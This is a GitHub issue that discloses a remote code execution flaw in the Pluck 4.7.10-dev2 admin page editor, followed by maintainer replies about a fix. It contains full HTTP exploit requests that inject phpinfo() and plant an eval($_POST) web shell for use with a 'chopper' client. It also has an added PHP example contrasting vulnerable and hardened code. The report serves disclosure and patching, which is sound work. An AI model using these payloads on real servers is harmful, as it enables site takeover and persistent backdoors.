
Pluck-4.7.10-dev2 admin backend has a remote command execution vulnerability when creating a new web page #80

Closed
SecurityCN opened this issue Oct 21, 2019 · 2 comments

Comments

@SecurityCN

Vulnerability location:
data\inc\functions.admin.php, lines 531-535

The hidden parameter passed in the POST request is saved to PHP, but the special character (') in the value is not escaped, so it can directly close the PHP syntax and remotely execute commands such as phpinfo(), eval(), etc.

Demo:
After the installation is successful, go to the management backend. Create a new page, enter a title and content, select "Show webpage", submit the request, and then intercept the request packet to modify the value of the hidden parameter to "no';phpinfo();'".

POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 131

title=aaaa&seo_name=&content=%3Cp%3Eaaaa%3C%2Fp%3E&description=&keywords=&hidden=no';phpinfo();'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98

http://192.168.80.1/pluck-4.7.10-dev2/?file=aaaa

Write a sentence Trojan

POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

title=bbbb&seo_name=&content=%3Cp%3Ebbbb%3C%2Fp%3E&description=&keywords=&hidden=no';@eval($_POST[b]);'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98

Use chopper connection
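The defect class described in this report, as an added example written for this page and not Pluck's own code: a hypothetical page writer that interpolates the hidden field straight into generated PHP source, next to a hardened version that restricts the field to the values it can legitimately hold (assumed here to be yes/no, from the "Show webpage" option) and serializes every value with var_export() so a quote can never close the literal.

```php
<?php
// Added example, not Pluck's code. The function names and the assumption that
// "hidden" is a yes/no flag are hypothetical and serve only to illustrate the
// report: a form value written into PHP source text, where a single quote in
// the value closes the string literal and whatever follows is parsed as code.

// Vulnerable pattern: raw interpolation into PHP source.
function writePageVulnerable(string $title, string $hidden): string
{
    return "<?php\n"
        . "\$title = '" . $title . "';\n"
        . "\$hidden = '" . $hidden . "';\n"
        . "?>";
}

// Hardened pattern: (1) accept only the values the field can legitimately
// carry; (2) emit every value through var_export(), which produces a properly
// escaped PHP string literal instead of trusting the raw bytes.
function writePageSafe(string $title, string $hidden): string
{
    if (!in_array($hidden, ['yes', 'no'], true)) {
        throw new InvalidArgumentException('hidden must be "yes" or "no"');
    }
    return "<?php\n"
        . '$title = ' . var_export($title, true) . ";\n"
        . '$hidden = ' . var_export($hidden, true) . ";\n"
        . "?>";
}

// The value shape from the report. Nothing is executed here; we only inspect
// the source text that each writer would have saved to disk.
$payload = "no';phpinfo();'";

echo writePageVulnerable('aaaa', $payload), "\n";
// Generated line: $hidden = 'no';phpinfo();'';
// The quote in the value has closed the literal, so phpinfo() would run as
// soon as the saved page file is included.

try {
    echo writePageSafe('aaaa', $payload), "\n";
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}

// Free-text fields such as the title still need escaping even when no
// whitelist applies; var_export() keeps the quote inside the literal ('it\'s').
echo writePageSafe("it's", 'no'), "\n";
```

The same two controls apply to every field the editor persists into a PHP file: validate against the expected domain where one exists, and never build source text by concatenating untrusted strings.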

BSteelooper pushed a commit that referenced this issue Oct 21, 2019
@BSteelooper
Contributor

Could you please test the attached version?

pluck-4.7.10-dev3.tar.gz

@BSteelooper
Contributor

Have you retested with the latest dev version?
